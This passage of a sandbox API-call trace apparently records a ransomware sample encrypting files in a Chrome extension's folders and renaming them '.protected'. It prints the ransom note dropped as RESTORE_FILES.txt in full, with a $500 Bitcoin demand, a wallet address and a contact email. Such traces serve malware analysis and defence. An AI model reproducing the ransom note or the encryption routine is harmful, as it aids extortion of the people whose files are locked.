nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf5, lpOverlapped=0x0) returned 1 [0080.101] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.101] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf5, lpOverlapped=0x0) returned 1 [0080.101] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.101] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.101] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.101] CloseHandle (hObject=0x168) returned 1 [0080.101] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.protected") returned 165 [0080.101] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.protected")) returned 1 [0080.102] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.102] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.102] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0080.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.102] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.102] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.103] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.103] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.103] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.103] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.103] CloseHandle (hObject=0x164) returned 1 [0080.103] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0080.103] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko") returned 141 [0080.103] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0080.103] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0080.104] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\*") returned 143 [0080.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.104] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.104] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.104] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.104] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.104] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.104] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\.") returned 143 [0080.104] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.104] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.104] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.104] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.104] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.104] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.104] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.104] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\..") returned 144 [0080.104] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.104] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.104] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.104] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0080.104] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.104] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.104] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.104] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.104] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json") returned 155 [0080.104] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.104] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.104] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.104] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.105] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json") returned 155 [0080.105] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.105] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json") returned 155 [0080.105] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.105] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json") returned 155 [0080.105] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.105] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0080.106] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.106] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0080.106] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.106] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.106] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.106] CloseHandle (hObject=0x168) returned 1 [0080.106] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.protected") returned 165 [0080.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.protected")) returned 1 [0080.107] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.107] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.107] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0080.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.107] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.107] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.108] lstrlenA (lpString="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") returned 684 [0080.108] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.108] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.108] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.108] CloseHandle (hObject=0x164) returned 1 [0080.108] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0080.108] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt") returned 141 [0080.108] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0080.108] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0080.108] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\*") returned 143 [0080.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.108] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.109] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.109] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.109] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.109] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.109] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\.") returned 143 [0080.109] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.109] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.109] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.109] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.109] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.109] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.109] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.109] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\..") returned 144 [0080.109] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.109] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.109] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.109] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0080.109] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.109] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.109] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.109] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.109] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json") returned 155 [0080.109] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.109] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.109] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.109] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.110] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json") returned 155 [0080.110] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.110] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json") returned 155 [0080.110] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.110] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json") returned 155 [0080.110] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.110] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0080.111] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.111] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0080.111] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.111] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.111] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.111] CloseHandle (hObject=0x168) returned 1 [0080.111] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
